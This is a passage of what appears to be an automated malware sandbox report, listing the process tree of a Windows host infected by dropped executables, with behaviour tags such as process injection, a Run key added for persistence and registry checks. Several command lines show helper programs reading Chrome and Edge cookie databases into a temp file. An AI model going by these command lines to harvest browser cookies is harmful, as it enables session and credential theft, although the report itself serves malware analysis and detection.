                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\h2M3xQ0AqgMN0KNk7XzZlZBS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\h2M3xQ0AqgMN0KNk7XzZlZBS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7304440.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7304440.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7444219.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7444219.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\pguRoIRSYz2yPz_YwJ0ChGGd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\pguRoIRSYz2yPz_YwJ0ChGGd.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\3lxfbvQg9IV8a2OrUjeuEmMh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\3lxfbvQg9IV8a2OrUjeuEmMh.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6448
• C:\Users\Admin\Documents\5uKNBpf1aZwGBNeZGMvq9KPj.exe
  "C:\Users\Admin\Documents\5uKNBpf1aZwGBNeZGMvq9KPj.exe"
  16⤵
  PID:5388
  • C:\Users\Admin\AppData\Roaming\7512635.exe
    "C:\Users\Admin\AppData\Roaming\7512635.exe"
    17⤵
    PID:8236
• C:\Users\Admin\Documents\s6ZSM_5y0xIRIIWCZVRjfZrP.exe
  "C:\Users\Admin\Documents\s6ZSM_5y0xIRIIWCZVRjfZrP.exe"
  16⤵
  PID:7884
• C:\Users\Admin\Documents\uALPUP_QTElVL8mL63DY4PWF.exe
  "C:\Users\Admin\Documents\uALPUP_QTElVL8mL63DY4PWF.exe"
  16⤵
  PID:7292
  • C:\Users\Admin\AppData\Local\Temp\11111.exe
    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:5616
  • C:\Users\Admin\AppData\Local\Temp\11111.exe
    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:9092
  • C:\Users\Admin\AppData\Local\Temp\22222.exe
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:8784
  • C:\Users\Admin\AppData\Local\Temp\22222.exe
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:8588
  • C:\Users\Admin\AppData\Local\Temp\22222.exe
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:5932
  • C:\Users\Admin\AppData\Local\Temp\22222.exe
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:8400
  • C:\Users\Admin\AppData\Local\Temp\22222.exe
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:8352
  • C:\Users\Admin\AppData\Local\Temp\22222.exe
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    17⤵
    PID:8672
• C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe
  "C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe"
  16⤵
  • Suspicious use of SetThreadContext
  PID:6944
  • C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe
    "C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe"
    17⤵
    • Checks processor information in registry
    PID:3204
• C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe
  "C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe"
  16⤵
  • Suspicious use of SetThreadContext
  PID:5020
  • C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe
    C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe
    17⤵
    PID:5412
• C:\Users\Admin\Documents\AOSlUCM1mSJjGUEqnrfEfz9P.exe
  "C:\Users\Admin\Documents\AOSlUCM1mSJjGUEqnrfEfz9P.exe"
  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\setup_install.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\y7q5xF9CQQaUp_Be8zJ1wUcX.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\GRpCHUuMFEFz5l51GkIT74oJ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\mksh7zGOzKU018F1f43HXeVG.exe
            "C:\Users\Admin\Documents\mksh7zGOzKU018F1f43HXeVG.exe"
            6⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of WriteProcessMemory
            PID:4240
          • C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe
            "C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe"
            6⤵
            PID:5076
            • C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe
              C:\Users\Admin\Documents\f1_thNNceZPfbiVlS1AlYoAe.exe
              7⤵
              • Executes dropped EXE
              PID:4880
          • C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe
            "C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe"
            6⤵
            • Executes dropped EXE
            PID:3288
            • C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe
              "C:\Users\Admin\Documents\eXcffQgr3CEyRAmt3BW6238i.exe" -a
              7⤵
              • Executes dropped EXE
              PID:4400
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        4⤵
        PID:1068
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        4⤵
        • Suspicious use of WriteProcessMemory
        PID:1560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_1.exe
        4⤵
        • Suspicious use of WriteProcessMemory
        PID:1420
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s BITS
  1⤵
  • Suspicious use of SetThreadContext
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  • Suspicious use of WriteProcessMemory
  PID:3092
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k SystemNetworkService
    2⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    PID:4428
• C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_1.exe
  sonia_1.exe
  1⤵
  • Executes dropped EXE
  • Suspicious use of WriteProcessMemory
  PID:3860
  • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_1.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_1.exe" -a
    2⤵
    • Executes dropped EXE
    PID:3500
• C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_6.exe
  sonia_6.exe
  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
  PID:5876
  • C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    2⤵
    • Loads dropped DLL
    • Modifies registry class
    PID:5888
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  1⤵
  • Drops file in Windows directory
  • Modifies Internet Explorer settings
  • Modifies registry class
  • Suspicious use of SetWindowsHookEx
  PID:5984
• C:\Windows\system32\browser_broker.exe
  C:\Windows\system32\browser_broker.exe -Embedding
  1⤵
  • Modifies Internet Explorer settings
  PID:6120
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies registry class
  • Suspicious use of SetWindowsHookEx
  PID:3648
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies Internet Explorer settings
  • Modifies registry class
  PID:6412
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies registry class
  PID:6440
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:7412
  • C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    2⤵
    • Loads dropped DLL
    PID:7428
• C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  1⤵
  • Modifies registry class
  PID:6376
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:6740
  • C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    2⤵
    • Loads dropped DLL
    PID:6432
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:9144
  • C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
